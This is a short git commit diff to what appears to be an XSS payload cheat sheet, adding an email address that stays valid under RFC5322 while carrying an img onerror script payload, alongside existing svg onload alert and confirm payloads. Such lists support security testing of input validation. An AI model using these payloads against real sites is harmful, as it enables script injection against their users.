Add additional XSS payload in email addresses RFC5322

This commit is contained in:
dave 2024-05-31 13:27:32 +02:00
parent b5251a673f
commit fcf69f8226

View File

@ -783,6 +783,12 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
"><svg/onload=confirm(1)>"@x.y
```
([RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/))
```javascript
xss@example.com(<img src='x' onerror='alert(document.location)'>)
```
### Bypass document blacklist
```javascript